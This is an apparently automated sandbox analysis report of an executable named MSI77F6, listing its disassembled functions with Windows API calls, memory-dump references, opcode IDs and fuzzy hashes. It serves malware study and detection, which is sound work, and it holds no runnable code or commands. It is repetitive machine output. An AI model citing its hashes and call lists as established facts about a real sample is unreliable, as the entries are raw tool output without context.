                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                        • Instruction ID: 43abe2c830121bbe67225c2a6d4437968fee0ec31e39e44873029b1dc00e6b4f
                                        • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                        • Instruction Fuzzy Hash: DF014EB1210701AED7159B38D807E26BBA8DF083A0F50C52EF55DCB1D0EB75E4008790
                                        Function 0078F2D0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID:
                                        • API String ID: 4104443479-0
                                        • Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                        • Instruction ID: e64208af6c6004ecd7cf815bcc910c9c4a520110ae444b4a84a33f43cb5b844a
                                        • Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                        • Instruction Fuzzy Hash: 6C01D631144A05EBCB30BF29E849A5ABBA8AF81360B20853DF85887651DB39A85187A1
                                        Function 007C95AF Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WSAStartup.WS2_32(00000202,?), ref: 007C95C9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Startup
                                        • String ID:
                                        • API String ID: 724789610-0
                                        • Opcode ID: 60faf1a11bea3f258fd14d61cc44c871fa37d3866aef016a8a0538d7668ce02f
                                        • Instruction ID: 17f36d805e10ac61d0e2e2e6b4426d73910460838f78d6a4c080c28c14471f88
                                        • Opcode Fuzzy Hash: 60faf1a11bea3f258fd14d61cc44c871fa37d3866aef016a8a0538d7668ce02f
                                        • Instruction Fuzzy Hash: 38E065776042146BC320EA64DC45AABB799BF85730F14875AFDA48B2C1EB34DD14C7D1
                                        Function 00773E39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        • FreeLibrary.KERNEL32(?,?,?,?,?,007734E2,?,00000001), ref: 00773E6D
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: FreeLibrary
                                        • String ID:
                                        • API String ID: 3664257935-0
                                        • Opcode ID: 7c291a5cea1aee3b57624b9e3b114c0e576e9973db6b19d0c31e5f697a00e285
                                        • Instruction ID: b1c713369bf3f85905f133c5498f2dab3d7f5c0d02dbd032b4ba93ddee8a2048
                                        • Opcode Fuzzy Hash: 7c291a5cea1aee3b57624b9e3b114c0e576e9973db6b19d0c31e5f697a00e285
                                        • Instruction Fuzzy Hash: 71F03971201751CFCF349F64D894826BBE1BF04759324CA3EE1DA82621C7B9A944EF00
                                        Function 007B79F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                        Download Yara Rule
                                        APIs
                                        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 007B7A11
                                          • Part of subcall function 00777E53: _memmove.LIBCMT ref: 00777EB9
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: FolderPath_memmove
                                        • String ID:
                                        • API String ID: 3334745507-0
                                        • Opcode ID: ea20bf38d7133ad66c35aa28141b7e5717329f609f2c804bd217ae4b3039016e
                                        • Instruction ID: b7683de0c7f65368e63f273848bd310b0ddc32f0cdfd2ee7b261cacd93f2ae7a
                                        • Opcode Fuzzy Hash: ea20bf38d7133ad66c35aa28141b7e5717329f609f2c804bd217ae4b3039016e
                                        • Instruction Fuzzy Hash: 2AD05EA66002286FDB64E6249C0DDFB37ADD744144F0042A0786DD2042E964AE4586E0
                                        Function 007B6852 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 007B6623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,007B685E,?,?,?,007E4A5C,0080E448,00000003,?,?), ref: 007B66E2
                                        • WriteFile.KERNEL32(?,?,008322E8,00000000,00000000,?,?,?,007E4A5C,0080E448,00000003,?,?,00774C44,?,?), ref: 007B686C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: File$PointerWrite
                                        • String ID:
                                        • API String ID: 539440098-0
                                        • Opcode ID: 0dee69c92b93c0990fa018fde9d4043b1a2bc38cc51deedee4b633bfa84d28d7
                                        • Instruction ID: de3b9f488007b4ef08916b60b5160e96d90b7ccababdf46102c1d883860a84d3
                                        • Opcode Fuzzy Hash: 0dee69c92b93c0990fa018fde9d4043b1a2bc38cc51deedee4b633bfa84d28d7
                                        • Instruction Fuzzy Hash: 4AE0B636400218FBDB20AF94D805BDABBB9EB04354F10451AF94195151D7B9AE14DBA5
                                        Function 0077193B Relevance: 1.5, APIs: 1, Instructions: 18windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00771952
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSendTimeout
                                        • String ID:
                                        • API String ID: 1599653421-0
                                        • Opcode ID: b1e7fef3e539cc121f1c2e97615e94c11cc2b098d42f978fc9ec1ebb8621f44f
                                        • Instruction ID: c012664cddfa586b7126b3e7fab1ffbb8d00e5ed1427215311ed5551789e1489
                                        • Opcode Fuzzy Hash: b1e7fef3e539cc121f1c2e97615e94c11cc2b098d42f978fc9ec1ebb8621f44f
                                        • Instruction Fuzzy Hash: DFD012F16902087EFB008761CD07EBB775CD721F81F0086617E06D64D1D6649E098574
                                        Function 007AE390 Relevance: 1.5, APIs: 1, Instructions: 16windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0077193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00771952
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 007AE3AA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID:
                                        • API String ID: 1777923405-0
                                        • Opcode ID: 6e119d3da5c0ff70bd1208a2cb4898e673455a94d80f4154ac261a68b94530ef
                                        • Instruction ID: 3cef98bd5ad73879f402b8ea007f63471cc778057757da1c0833a747bc4dda7b
                                        • Opcode Fuzzy Hash: 6e119d3da5c0ff70bd1208a2cb4898e673455a94d80f4154ac261a68b94530ef
                                        • Instruction Fuzzy Hash: 6BD01231144150EAFE706B18FC06FD577A29B41790F118559B580AB0E5C6D65C419644
                                        Function 007C6FC3 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: TextWindow
                                        • String ID:
                                        • API String ID: 530164218-0
                                        • Opcode ID: d36f5c35c18a4d35cf0cf8dd4392a8213c0639b014ba0d37775b8edb840f9b14
                                        • Instruction ID: c6f695aee2a01b406c0d360b38b623cd749dd7bc6e2edc705858dda4f8a8da28
                                        • Opcode Fuzzy Hash: d36f5c35c18a4d35cf0cf8dd4392a8213c0639b014ba0d37775b8edb840f9b14
                                        • Instruction Fuzzy Hash: A0D067362105149FCB01AF99D848C9577E9FB4D6507018451F509DB231D665EC509B95
                                        Function 00774FB3 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,007E49DA,?,?,00000000), ref: 00774FC4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: 13326f58cadff0a4b808cf46e5454e82f209765095a64bdd861caa1bbfe88210
                                        • Instruction ID: 8b40df57f6f5d79a24ba084333c33a3b62a05da00441cbed315e32aef2e00f7d
                                        • Opcode Fuzzy Hash: 13326f58cadff0a4b808cf46e5454e82f209765095a64bdd861caa1bbfe88210
                                        • Instruction Fuzzy Hash: A6D0C97464020CBFEB10CB90DC46FAA7BBDEB04718F200194F600A62D0D2F2BE408B55
                                        Function 007E4DDC Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: ed4f1ea31bf394f98d29ad7f9f96f8694d3f14786e11cba811e94134d30ba067
                                        • Instruction ID: 5401ffb3517588e3b5d7f8d00856660cad5d9e6fdbdb3bd26a6bb59227693977
                                        • Opcode Fuzzy Hash: ed4f1ea31bf394f98d29ad7f9f96f8694d3f14786e11cba811e94134d30ba067
                                        • Instruction Fuzzy Hash: 01D0C9B1544245DBEB306F69E80875AB7E4BF41300F248829E9CA82250D7BEACC29B51
                                        Function 00794129 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __wfsopen
                                        • String ID:
                                        • API String ID: 197181222-0
                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                        • Instruction ID: b51879d3dfc0e7a113e116895c6b31b498c06800c7e02b7809ee99b0f12d1e2f
                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                        • Instruction Fuzzy Hash: D9B0927248030CB7CE012A82EC02E493B199B50660F008020FB0C18161A677AAA19A89
                                        Function 007750EC Relevance: 1.3, APIs: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • CloseHandle.KERNEL32(?,?,?,007750BE,?,00775088,?,0077BE3D,008322E8,?,00000000,?,00773E2E,?,00000000,?), ref: 0077510C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CloseHandle
                                        • String ID:
                                        • API String ID: 2962429428-0
                                        • Opcode ID: ce1fa3ae815bc23b1237f5fcdd2ec35fb07b1853962322b40d300cf903f907dd
                                        • Instruction ID: 0abe0451546345637e043dcd58fbb20d731981b50d3329f805508ff6c32bda9f
                                        • Opcode Fuzzy Hash: ce1fa3ae815bc23b1237f5fcdd2ec35fb07b1853962322b40d300cf903f907dd
                                        • Instruction Fuzzy Hash: D2E0B675400B02CBC6314F1AE844452FBF5FFE13A13218A2FD1E9826A0D7B45886DB90

                                        Non-executed Functions

                                        Function 007DF5D0 Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 630windowkeyboardnativeCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0078AF8E
                                        • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?,?), ref: 007DF64E
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007DF6AD
                                        • GetWindowLongW.USER32(?,000000F0), ref: 007DF6EA
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007DF711
                                        • SendMessageW.USER32 ref: 007DF737
                                        • _wcsncpy.LIBCMT ref: 007DF7A3
                                        • GetKeyState.USER32(00000011), ref: 007DF7C4
                                        • GetKeyState.USER32(00000009), ref: 007DF7D1
                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 007DF7E7
                                        • GetKeyState.USER32(00000010), ref: 007DF7F1
                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 007DF820
                                        • SendMessageW.USER32 ref: 007DF843
                                        • SendMessageW.USER32(?,00001030,?,007DDE69), ref: 007DF940
                                        • SetCapture.USER32(?), ref: 007DF970
                                        • ClientToScreen.USER32(?,?), ref: 007DF9D4
                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 007DF9FA
                                        • ReleaseCapture.USER32 ref: 007DFA05
                                        • GetCursorPos.USER32(?), ref: 007DFA3A
                                        • ScreenToClient.USER32(?,?), ref: 007DFA47
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 007DFAA9
                                        • SendMessageW.USER32 ref: 007DFAD3
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 007DFB12
                                        • SendMessageW.USER32 ref: 007DFB3D
                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 007DFB55
                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 007DFB60
                                        • GetCursorPos.USER32(?), ref: 007DFB81
                                        • ScreenToClient.USER32(?,?), ref: 007DFB8E
                                        • GetParent.USER32(?), ref: 007DFBAA
                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 007DFC10
                                        • SendMessageW.USER32 ref: 007DFC40
                                        • ClientToScreen.USER32(?,?), ref: 007DFC96
                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007DFCC2
                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 007DFCEA
                                        • SendMessageW.USER32 ref: 007DFD0D
                                        • ClientToScreen.USER32(?,?), ref: 007DFD57
                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 007DFD87
                                        • GetWindowLongW.USER32(?,000000F0), ref: 007DFE1C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend$ClientScreen$LongStateWindow$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                        • String ID: @GUI_DRAGID$F
                                        • API String ID: 3461372671-4164748364
                                        • Opcode ID: 7c7f05924d1660341fc221d59673aa0755586c2b653e5228aa5ff04668805e3d
                                        • Instruction ID: f25ae11362babe53ed8409b57b2b847806afe7f32ab7dee891adfe83285adbbc
                                        • Opcode Fuzzy Hash: 7c7f05924d1660341fc221d59673aa0755586c2b653e5228aa5ff04668805e3d
                                        • Instruction Fuzzy Hash: 6032AD71208245AFDB20EF64C888AAABBF5FF48354F14492AF696873B1D738DC54CB51
                                        Function 007DA8DC Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 574windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 007DAFDB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: %d/%02d/%02d
                                        • API String ID: 3850602802-328681919
                                        • Opcode ID: 0d82bd8ac266b1806fc967a2aafb38d5eed9c7af7ab3673858ece1b33dfbfd79
                                        • Instruction ID: 9eb1c3dff3e73496d52c93eb286879b27037c9314c88de17a992aeebe32e9eb2
                                        • Opcode Fuzzy Hash: 0d82bd8ac266b1806fc967a2aafb38d5eed9c7af7ab3673858ece1b33dfbfd79
                                        • Instruction Fuzzy Hash: 0B12ADB1600208BBEB258F64CC49FAE7BB9FF45350F14825AF519EB2D1DB788941CB52
                                        Function 0078F78E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 0078F796
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007E4388
                                        • IsIconic.USER32(000000FF), ref: 007E4391
                                        • ShowWindow.USER32(000000FF,00000009), ref: 007E439E
                                        • SetForegroundWindow.USER32(000000FF), ref: 007E43A8
